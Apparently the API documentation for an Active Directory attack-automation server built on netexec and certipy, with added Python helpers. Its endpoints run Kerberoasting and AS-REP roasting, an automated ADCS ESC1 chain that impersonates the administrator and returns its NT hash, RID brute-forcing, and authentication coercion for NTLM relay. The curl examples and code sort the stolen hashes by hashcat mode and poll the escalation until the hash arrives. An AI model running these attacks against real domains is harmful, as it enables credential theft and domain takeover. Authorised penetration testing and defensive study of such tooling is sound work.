All authenticated endpoints support two authentication modes:
  • NTLM / Kerberos password auth: provide username, password and domain. Set use_kerberos: true to add the -k flag to the netexec command. Kerberos rejects requests whose clock skew exceeds the KDC tolerance (5 minutes by default), so this mode also requires sudo_password for the ntpdate time sync.
  • Kerberos ccache auth: set use_kcache: true and provide ccache_file as a bare filename (basename only, no path components). The file must exist in recon/ccache/. The username and domain are extracted from the ccache automatically, so they can be omitted. sudo_password is required in this mode as well.
DC host and DC IP are always read from the stored network info and do not need to be passed in every request.
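The following helper is an added example, not code from the project: it builds the authentication part of a request body according to the two modes above and enforces the rules the page states (the modes are exclusive, ccache_file is a bare basename, either Kerberos mode needs sudo_password). The helper name, its error messages and the redact() function are assumptions.

```python
"""Added example (not the project's own code): assemble and validate the auth
fields shared by every authenticated endpoint described on this page."""
import json

SECRET_FIELDS = ("password", "sudo_password")


def build_auth_body(username=None, password=None, domain=None,
                    use_kerberos=False, use_kcache=False,
                    ccache_file=None, sudo_password=None):
    """Return the dict to POST to an authenticated endpoint, or raise ValueError."""
    if use_kerberos and use_kcache:
        raise ValueError("use_kerberos and use_kcache are mutually exclusive")
    body = {}
    if use_kcache:
        if not ccache_file:
            raise ValueError("use_kcache requires ccache_file")
        # The server resolves ccache_file inside recon/ccache/, so only a bare
        # filename is valid; refuse anything that could point elsewhere.
        if ccache_file in (".", "..") or "/" in ccache_file or "\\" in ccache_file:
            raise ValueError("ccache_file must be a basename, got %r" % ccache_file)
        body["use_kcache"] = True
        body["ccache_file"] = ccache_file
        # username and domain are read from the ccache by the server.
    else:
        if not username or password is None:
            raise ValueError("password auth needs username and password")
        body["username"] = username
        body["password"] = password
        if use_kerberos:
            body["use_kerberos"] = True
    if domain:
        body["domain"] = domain
    if use_kerberos or use_kcache:
        # Both Kerberos modes run ntpdate via sudo to remove clock skew.
        if not sudo_password:
            raise ValueError("use_kerberos/use_kcache require sudo_password for time sync")
        body["sudo_password"] = sudo_password
    return body


def redact(body):
    """Copy of a request body that is safe to log: secret fields masked, in the
    same spirit as the API's 'command' response field (password redacted)."""
    return {k: ("***" if k in SECRET_FIELDS and v else v) for k, v in body.items()}


if __name__ == "__main__":
    # Password mode, as in the BloodHound curl example on this page.
    print(json.dumps(redact(build_auth_body("administrator", "Password1!", "corp.local"))))
    # ccache mode: only the basename of a file under recon/ccache/ is accepted.
    print(json.dumps(redact(build_auth_body(use_kcache=True, ccache_file="administrator.ccache",
                                            sudo_password="sudo-secret"))))
```

The basename check matters because the server joins ccache_file onto recon/ccache/; rejecting separators and dot segments on the client keeps a typo or a copied absolute path from ever reaching the API.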

POST /api/bloodhound/run

Collects BloodHound data via netexec ldap ... --bloodhound --collection All. NetExec writes the resulting .zip to ~/.nxc/logs/; it is moved to recon/ automatically after completion. Note that the All collection method also contacts every domain computer for session and local-group data, which is considerably noisier than LDAP-only collection.
curl -X POST http://localhost:8000/api/bloodhound/run \
  -H "Content-Type: application/json" \
  -d '{
    "username": "administrator",
    "password": "Password1!",
    "domain": "corp.local"
  }'

Request Body

  • username (string): Domain account username. Required for NTLM/Kerberos password auth.
  • password (string): Account password. Required for NTLM/Kerberos password auth.
  • domain (string): Active Directory domain. Falls back to stored network info if omitted.
  • use_kerberos (boolean): Add the -k flag to use Kerberos with password credentials. Requires sudo_password for time sync.
  • use_kcache (boolean): Authenticate using a Kerberos ccache file. Requires ccache_file and sudo_password.
  • ccache_file (string): Basename of the ccache file in recon/ccache/ (e.g. administrator.ccache).
  • sudo_password (string): Required when use_kerberos or use_kcache is true (for ntpdate time sync).

Response

  • status (string): "success" on completion.
  • scan_id (string): UUID of the scan record.
  • message (string): Completion summary including the DC hostname.
  • command (string): NetExec command executed (password redacted).

POST /api/kerberoast/run

Requests a TGS for every account that has a servicePrincipalName set (netexec ldap ... --kerberoasting) and extracts the encrypted ticket portion as an offline-crackable hash. Any domain account can request these tickets, so a low-privileged user is sufficient. Hashes are parsed automatically and stored in the credentials database with source = "kerberoast". RC4 (etype 23) hashes crack far faster than AES (etype 17/18) ones, so note the etype before choosing what to crack first.
curl -X POST http://localhost:8000/api/kerberoast/run \
  -H "Content-Type: application/json" \
  -d '{
    "username": "lowpriv",
    "password": "Pass123!"
  }'

Request Body

  • username (string): Domain account username.
  • password (string): Account password.
  • domain (string): Domain name. Falls back to stored network info.
  • use_kerberos (boolean): Use Kerberos protocol with password credentials.
  • use_kcache (boolean): Use ccache file for authentication.
  • ccache_file (string): ccache filename in recon/ccache/.
  • sudo_password (string): Required when time sync is needed.

Response

  • status (string): "success" on completion.
  • scan_id (string): Scan UUID.
  • message (string): Includes the count of hashes imported into the credentials database.

POST /api/asreproast/run

Finds accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH) and requests an AS-REP for each via netexec ldap ... --asreproast; the encrypted part of the reply is the crackable hash, and no valid credentials are needed for the request itself once the usernames are known. Hashes are stored automatically with source = "asreproast".

Request Body

Same parameters as /api/kerberoast/run: username, password, domain, use_kerberos, use_kcache, ccache_file, sudo_password.

Response

  • status (string): "success" on completion.
  • scan_id (string): Scan UUID.
  • message (string): Includes count of hashes found and imported.
  • output (string): Raw netexec output.
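Both /api/kerberoast/run and /api/asreproast/run say the hashes are "parsed and stored" in the credentials database. The parser below is an added example, not the project's code: it pulls the hash lines out of raw netexec output for either endpoint, records user, realm, SPN and encryption type, and maps each to the hashcat mode it needs. The sample output lines are constructed for this example (ciphertext shortened) and the record field names are assumptions.

```python
"""Added example (not the project's own code): parse netexec --kerberoasting /
--asreproast output into credential records plus hashcat modes."""
import re

# hashcat modes for the hash formats netexec (via impacket) emits
HASHCAT_MODES = {
    ("kerberoast", 23): 13100,  # $krb5tgs$23$   RC4-HMAC
    ("kerberoast", 17): 19600,  # $krb5tgs$17$   AES128-CTS-HMAC-SHA1-96
    ("kerberoast", 18): 19700,  # $krb5tgs$18$   AES256-CTS-HMAC-SHA1-96
    ("asreproast", 23): 18200,  # $krb5asrep$23$ RC4-HMAC
}
_HEX = r"[0-9a-fA-F]+"
# RC4 TGS-REP:  $krb5tgs$23$*user$REALM$spn*$checksum$edata
_TGS_RC4 = re.compile(r"\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$(?P<cksum>%s)\$(?P<edata>%s)" % (_HEX, _HEX))
# AES TGS-REP:  $krb5tgs$17|18$user$REALM$*spn*$checksum$edata
_TGS_AES = re.compile(r"\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*\$(?P<cksum>%s)\$(?P<edata>%s)" % (_HEX, _HEX))
# RC4 AS-REP:   $krb5asrep$23$user@REALM:checksum$edata
# (AES AS-REP lines, $krb5asrep$17$/$18$, use a different layout and hashcat
# modes 32100/32200; they are not handled here.)
_ASREP_RC4 = re.compile(r"\$krb5asrep\$(?P<etype>23)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):(?P<cksum>%s)\$(?P<edata>%s)" % (_HEX, _HEX))
PATTERNS = {"kerberoast": (_TGS_RC4, _TGS_AES), "asreproast": (_ASREP_RC4,)}

# Constructed netexec output (not real captures); ciphertext truncated.
SAMPLE_KERBEROAST = """\
LDAP  10.10.10.1  389  DC01  [*] Total of records returned 2
LDAP  10.10.10.1  389  DC01  sAMAccountName: svc_sql memberOf:  pwdLastSet: 2023-03-01 09:12:44.000000 lastLogon: 2024-01-05 08:00:01.000000
LDAP  10.10.10.1  389  DC01  $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$1a2b3c4d5e6f708192a3b4c5d6e7f801$0011aabbccddeeff
LDAP  10.10.10.1  389  DC01  $krb5tgs$18$svc_http$CORP.LOCAL$*HTTP/web01.corp.local*$a1b2c3d4e5f60718293a4b5c$ffeeddccbbaa9988
"""
SAMPLE_ASREPROAST = """\
LDAP  10.10.10.1  389  DC01  [*] Total of records returned 1
LDAP  10.10.10.1  389  DC01  $krb5asrep$23$jdoe@CORP.LOCAL:0123456789abcdef0123456789abcdef$deadbeefcafef00d
"""


def parse_roast_output(text, source):
    """Extract every crackable hash from raw netexec output for the given source
    ("kerberoast" or "asreproast"); banner and status lines are ignored."""
    if source not in PATTERNS:
        raise ValueError("source must be 'kerberoast' or 'asreproast'")
    records = []
    for line in text.splitlines():
        for pat in PATTERNS[source]:
            m = pat.search(line)
            if not m:
                continue
            etype = int(m.group("etype"))
            records.append({
                "source": source,
                "username": m.group("user"),
                "domain": m.group("realm"),
                "spn": m.groupdict().get("spn"),  # None for AS-REP hashes
                "etype": etype,
                "hashcat_mode": HASHCAT_MODES[(source, etype)],
                "hash": m.group(0),
            })
            break  # one hash per line
    return records


def hashcat_buckets(records):
    """Group hashes by hashcat mode; each bucket is one input file for hashcat -m <mode>."""
    buckets = {}
    for r in records:
        buckets.setdefault(r["hashcat_mode"], []).append(r["hash"])
    return buckets


if __name__ == "__main__":
    recs = parse_roast_output(SAMPLE_KERBEROAST, "kerberoast")
    recs += parse_roast_output(SAMPLE_ASREPROAST, "asreproast")
    for r in recs:
        print(r["source"], r["username"], r["spn"], "etype", r["etype"], "-> -m", r["hashcat_mode"])
    print({mode: len(h) for mode, h in hashcat_buckets(recs).items()})
```

The per-mode buckets are what you actually hand to hashcat; mixing an AES ticket into a 13100 run just produces a parse error, and the etype is the cheapest signal for which hashes are worth the GPU time.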

POST /api/adcs/run

Enumerates Active Directory Certificate Services vulnerabilities using certipy-ad find. Parses the JSON output and stores discovered ESC vulnerabilities in the adcs_vulns database table.
curl -X POST http://localhost:8000/api/adcs/run \
  -H "Content-Type: application/json" \
  -d '{
    "username": "lowpriv",
    "password": "Pass123!",
    "domain": "corp.local"
  }'

Request Body

  • username (string): Domain account username.
  • password (string): Account password.
  • domain (string): Domain. Falls back to stored network info.
  • target (string): DC IP to target. Falls back to stored DC IP.
  • vulnerable_only (boolean): Pass -vulnerable to certipy-ad to only return vulnerable templates. Defaults to true.
  • use_kerberos (boolean): Use Kerberos protocol.
  • use_kcache (boolean): Use ccache file.
  • ccache_file (string): ccache filename.
  • sudo_password (string): Required for time sync with Kerberos.

Response

  • status (string): "success" on completion.
  • scan_id (string): Scan UUID.
  • message (string): Summary including the target and whether ADCS was found.

GET /api/adcs/vulns

Returns all ADCS vulnerability records stored in the database from the last certipy scan.
curl http://localhost:8000/api/adcs/vulns

Response

  • vulns (array): Array of ADCS vulnerability objects.

POST /api/adcs/esc1/run

Executes the full automated Certipy ESC1 privilege escalation chain (a template that low-privileged users can enroll in, that lets the requester supply the subject alternative name, and whose EKU permits client authentication) in three steps:
  1. sid: query the objectSid of the account named in upn using certipy-ad account ... read, so the SID can be embedded in the certificate and the certificate still maps to the account on DCs that enforce strong certificate mapping (KB5014754).
  2. req: request a certificate from the vulnerable template using certipy-ad req, with the SAN set to the target UPN.
  3. auth: authenticate with the certificate via PKINIT using certipy-ad auth, which returns the account's NT hash (and a TGT).
The resulting NT hash (reported as ntlm_hash) is automatically saved to the credentials database with source = "certipy-ESC1".
curl -X POST http://localhost:8000/api/adcs/esc1/run \
  -H "Content-Type: application/json" \
  -d '{
    "username": "lowpriv",
    "password": "Pass123!",
    "domain": "corp.local",
    "dc_ip": "10.10.10.1",
    "ca_host": "ca01.corp.local",
    "ca_name": "corp-CA01-CA",
    "template": "VulnerableTemplate",
    "upn": "administrator"
  }'

Request Body

  • username (string, required): Domain account username to authenticate as.
  • password (string, required): Account password.
  • domain (string, required): Active Directory domain.
  • dc_ip (string, required): Domain controller IP.
  • ca_host (string, required): Hostname of the Certificate Authority server.
  • ca_name (string, required): CA name as it appears in certipy output (e.g. corp-DC01-CA).
  • template (string, required): Name of the vulnerable certificate template to abuse.
  • upn (string, required): User Principal Name to impersonate in the certificate (typically administrator).

Response

  • status (string): "success" when the attack chain was launched.
  • scan_id (string): UUID for polling with /api/adcs/esc1/status?scan_id=<id>.

GET /api/adcs/esc1/status

Returns the current state of a running or completed ESC1 attack chain.
curl "http://localhost:8000/api/adcs/esc1/status?scan_id=<uuid>"

Query Parameter

  • scan_id (string, required): UUID returned by /api/adcs/esc1/run.

Response

  • status (string): running, completed, error, or not_found.
  • phase (string): Current attack phase: sid, req, or auth.
  • output (string): Accumulated log output from all three certipy steps.
  • ntlm_hash (string): The captured NTLM hash (populated on completion), or null.
  • error (string): Error message if status is error, otherwise null.
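Since /api/adcs/esc1/run returns as soon as the chain is launched, a client has to poll /api/adcs/esc1/status and react to each of the four status values above. The script below is an added example, not the project's own client: it validates the required fields, launches the chain, polls until the status leaves running, and raises on error or not_found. The HTTP transport is injectable so the control flow runs offline; http_json, BASE_URL and the scripted demo replies (including the hash value) are assumptions constructed for the example.

```python
"""Added example (not the project's own code): drive the ESC1 run/status pair
described on this page, with an injectable transport for offline use."""
import json
import time
import urllib.parse
import urllib.request

BASE_URL = "http://localhost:8000"  # assumed; matches the curl examples on this page
ESC1_REQUIRED = ("username", "password", "domain", "dc_ip",
                 "ca_host", "ca_name", "template", "upn")


def http_json(method, path, body=None):
    """Send a JSON request to the API and decode the JSON reply (stdlib only)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(BASE_URL + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode())


def run_esc1(params, transport=http_json, interval=2.0, max_polls=300, sleep=time.sleep):
    """Launch the sid -> req -> auth chain and poll until it finishes.
    Returns a dict with scan_id, the phases observed, ntlm_hash and output.
    Raises ValueError for an incomplete request and RuntimeError when the API
    reports error/not_found, when the launch fails, or when polling times out."""
    missing = [k for k in ESC1_REQUIRED if not params.get(k)]
    if missing:
        raise ValueError("missing required ESC1 parameters: " + ", ".join(missing))
    launched = transport("POST", "/api/adcs/esc1/run", params)
    if launched.get("status") != "success" or not launched.get("scan_id"):
        raise RuntimeError("launch failed: %r" % (launched,))
    scan_id = launched["scan_id"]
    status_path = "/api/adcs/esc1/status?scan_id=" + urllib.parse.quote(scan_id)
    phases = []
    for _ in range(max_polls):
        st = transport("GET", status_path)
        if st.get("phase") and st["phase"] not in phases:
            phases.append(st["phase"])
        status = st.get("status")
        if status == "completed":
            if not st.get("ntlm_hash"):
                # Defensive: the API documents ntlm_hash as populated on completion.
                raise RuntimeError("completed without ntlm_hash:\n" + (st.get("output") or ""))
            return {"scan_id": scan_id, "phases": phases,
                    "ntlm_hash": st["ntlm_hash"], "output": st.get("output", "")}
        if status == "error":
            raise RuntimeError("ESC1 failed in phase %s: %s" % (st.get("phase"), st.get("error")))
        if status == "not_found":
            raise RuntimeError("server does not know scan_id " + scan_id)
        sleep(interval)  # still running
    raise RuntimeError("gave up on scan %s after %d polls (phases seen: %s)"
                       % (scan_id, max_polls, phases))


def scripted_transport(replies):
    """Offline transport returning the given replies in order (constructed data)."""
    it = iter(replies)
    return lambda method, path, body=None: next(it)


if __name__ == "__main__":
    # Scripted replies stand in for the server; the hash is a constructed value.
    demo = scripted_transport([
        {"status": "success", "scan_id": "11111111-2222-3333-4444-555555555555"},
        {"status": "running", "phase": "sid", "output": "", "ntlm_hash": None, "error": None},
        {"status": "running", "phase": "req", "output": "", "ntlm_hash": None, "error": None},
        {"status": "completed", "phase": "auth", "output": "[*] Got hash for 'administrator@corp.local'",
         "ntlm_hash": "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", "error": None},
    ])
    params = {"username": "lowpriv", "password": "Pass123!", "domain": "corp.local",
              "dc_ip": "10.10.10.1", "ca_host": "ca01.corp.local", "ca_name": "corp-CA01-CA",
              "template": "VulnerableTemplate", "upn": "administrator"}
    print(run_esc1(params, transport=demo, sleep=lambda s: None))
    # Against a live instance: run_esc1(params)  uses http_json and BASE_URL.
```

Checking the required fields client-side is worthwhile because every one of them (ca_name, template, upn) comes straight out of the certipy find output, and a typo there only surfaces as an error status in the req phase after the chain has already been launched.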

POST /api/domain-info/run

Collects domain controller information by running four netexec queries in parallel:
  • --dc-list (DC enumeration, ldap)
  • --pass-pol (password policy; in netexec this option belongs to the smb protocol, not ldap)
  • -M maq (Machine Account Quota module, ldap)
  • --get-sid (domain SID, ldap)
This is a background operation; the endpoint returns immediately with a scan_id. Once the tasks finish, the stored results are available from GET /api/domain-info and GET /api/password-policy.

Request Body

Same auth parameters as /api/bloodhound/run (username, password, domain, use_kerberos, use_kcache, ccache_file, sudo_password) plus an optional target (DC IP; falls back to the stored DC IP).

Response

  • status (string): "success" when background tasks were launched.
  • scan_id (string): Scan UUID for polling.
  • message (string): "Domain info scan started in background".

POST /api/domain-info/delegation/run

Enumerates Kerberos delegation (unconstrained, constrained, and resource-based) via netexec ldap ... --find-delegation. Results are stored in the delegation table.

Request Body

Same auth parameters as BloodHound: username, password, domain, use_kerberos, use_kcache, ccache_file, sudo_password.

Response

  • status (string): "success" on completion.
  • message (string): Count of delegation entries found.
  • data (array): Array of delegation objects returned directly in the response.

GET /api/domain-info/delegation/data

Returns all delegation records stored in the database from the last delegation scan.
curl http://localhost:8000/api/domain-info/delegation/data

Response

  • status (string): "success" on success.
  • delegations (array): Array of delegation objects (same schema as above), ordered by account name.

GET /api/domain-info

Returns all domain controller records stored in the database.
curl http://localhost:8000/api/domain-info

Response

  • status (string): "success" on success.
  • data (array): Array of DC info objects.

GET /api/password-policy

Returns the domain password policy stored from the last domain info scan.
curl http://localhost:8000/api/password-policy

Response

  • status (string): "success" on success.
  • policy (object): Password policy fields.

POST /api/users/rid-brute

Enumerates domain users, groups and machine accounts by cycling RIDs over SMB (netexec smb ... --rid-brute, which resolves candidate SIDs through LSA LookupSids). No domain credentials are required if the target accepts a null or guest session, but current DCs reject both by default, so a low-privileged domain account is the reliable choice. Machine accounts are reported as SidTypeUser with a trailing $. Results are stored in the users and groups tables.
curl -X POST http://localhost:8000/api/users/rid-brute \
  -H "Content-Type: application/json" \
  -d '{
    "target": "10.10.10.1",
    "username": "",
    "password": ""
  }'

Request Body

  • target (string, required): IP or hostname of the target DC or domain-joined host.
  • username (string, required): SMB username (use empty string or "guest" for unauthenticated).
  • password (string, required): SMB password (empty string for null session).

Response

  • status (string): "success" when the background task was launched.
  • scan_id (string): Scan UUID.
  • output_file (string): Path to the raw netexec output file.
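The endpoint stores the raw netexec output and splits the results into users and groups tables. The parser below is an added example, not the project's own code: it reads --rid-brute lines from the output file, separates users, machine accounts and groups by SidType, and flags well-known RIDs whose names have been changed (a renamed RID 500 is still the built-in Administrator). The sample output is constructed for this example and the function and field names are assumptions.

```python
"""Added example (not the project's own code): parse netexec --rid-brute output
into users / computers / groups and spot renamed well-known accounts."""
import re

# "500: CORP\Administrator (SidTypeUser)" after netexec's "SMB ip port host" prefix
_RID_LINE = re.compile(r"(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<sid_type>SidType\w+)\)\s*$")

# Well-known domain RIDs whose names are fixed by the RID, not by the label.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt"}

# Constructed netexec output (not a real capture).
SAMPLE_RID_BRUTE = """\
SMB  10.10.10.1  445  DC01  [+] corp.local\\: 
SMB  10.10.10.1  445  DC01  498: CORP\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.10.1  445  DC01  500: CORP\\Administrator (SidTypeUser)
SMB  10.10.10.1  445  DC01  502: CORP\\krbtgt (SidTypeUser)
SMB  10.10.10.1  445  DC01  512: CORP\\Domain Admins (SidTypeGroup)
SMB  10.10.10.1  445  DC01  1000: CORP\\DC01$ (SidTypeUser)
SMB  10.10.10.1  445  DC01  1104: CORP\\j.doe (SidTypeUser)
SMB  10.10.10.1  445  DC01  544: BUILTIN\\Administrators (SidTypeAlias)
"""


def parse_rid_brute(text):
    """Return one dict per resolved RID; banner and error lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = _RID_LINE.search(line)
        if m:
            entries.append({"rid": int(m.group("rid")), "domain": m.group("domain"),
                            "name": m.group("name"), "sid_type": m.group("sid_type")})
    return entries


def split_accounts(entries):
    """Return (users, computers, groups). Machine accounts come back as
    SidTypeUser with a trailing '$'; SidTypeAlias entries are builtin/local groups."""
    users, computers, groups = [], [], []
    for e in entries:
        if e["sid_type"] == "SidTypeUser":
            (computers if e["name"].endswith("$") else users).append(e)
        elif e["sid_type"] in ("SidTypeGroup", "SidTypeAlias"):
            groups.append(e)
    return users, computers, groups


def renamed_builtins(entries):
    """Entries whose RID is well known but whose name was changed, e.g. a renamed Administrator."""
    return [e for e in entries
            if e["rid"] in WELL_KNOWN_RIDS and e["name"] != WELL_KNOWN_RIDS[e["rid"]]]


if __name__ == "__main__":
    entries = parse_rid_brute(SAMPLE_RID_BRUTE)
    users, computers, groups = split_accounts(entries)
    print("users:", [u["name"] for u in users])
    print("computers:", [c["name"] for c in computers])
    print("groups:", [g["name"] for g in groups])
    print("renamed well-known accounts:", renamed_builtins(entries))
```

Keying on the RID rather than the name is the point: renaming Administrator hides it from a name-based user list but not from a RID cycle, and the same holds for krbtgt and Guest.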

POST /api/users/export

Enumerates domain user accounts with full attributes (last password set, bad password count, description) via netexec smb ... --users. Results are stored in the users table.

Request Body

  • target (string, required): Target DC IP or hostname.
  • username (string, required): Authenticated domain account username.
  • password (string, required): Account password.

Response

  • status (string): "success" on completion.
  • message (string): "User enumeration completed".
  • scan_id (string): Scan UUID.

POST /api/zerologon/run

Tests for the Zerologon vulnerability (CVE-2020-1472) via netexec smb <target> -M zerologon. No credentials are required. The module only checks whether Netlogon accepts an all-zero client credential; it does not exploit the flaw or reset the DC machine account password. If target is not provided, the stored DC IP is used.
curl -X POST http://localhost:8000/api/zerologon/run \
  -H "Content-Type: application/json" \
  -d '{"target": "10.10.10.1"}'

Request Body

  • target (string): DC IP to test. Falls back to stored DC IP if omitted.

Response

  • status (string): "success" on completion.
  • message (string): Completion message.
  • output (string): Full netexec output including the vulnerability verdict.
  • scan_id (string): Scan UUID.

POST /api/coerce/run

Runs the coerce_plus NetExec module to force the target host to authenticate (as its machine account) to your listener. All coercion methods implemented by the module (PetitPotam, the print spooler bug, DFSCoerce, etc.) are supported, and ALWAYS=true keeps attempting every method even after one succeeds. The listener must be reachable from the target. A machine account's NTLM response is not realistically crackable, so the value of coercion is in relaying it (e.g. with ntlmrelayx), which in turn requires a relay target that does not enforce signing.
curl -X POST http://localhost:8000/api/coerce/run \
  -H "Content-Type: application/json" \
  -d '{
    "target": "10.10.10.1",
    "listener": "10.10.14.5",
    "username": "lowpriv",
    "password": "Pass123!",
    "domain": "corp.local",
    "always": true
  }'

Request Body

  • target (string, required): IP or hostname of the machine to coerce (typically the DC).
  • listener (string): IP address of your listener (Responder/ntlmrelayx). Maps to the LISTENER= module option.
  • username (string): Domain account username for the SMB session. Use empty string for unauthenticated attempts.
  • password (string): Account password.
  • domain (string): Domain name. Falls back to stored network info.
  • always (boolean): Set ALWAYS=true to continue attempting all coercion methods even after one succeeds. Defaults to false.
  • method (string): Restrict to a specific coercion method (e.g. "PetitPotam", "PrintSpooler"). When omitted, all methods are attempted.

Response

  • status (string): "success" on completion.
  • message (string): Completion summary.
  • output (string): Full netexec output.
  • scan_id (string): Scan UUID.
  • command (string): NetExec command executed.
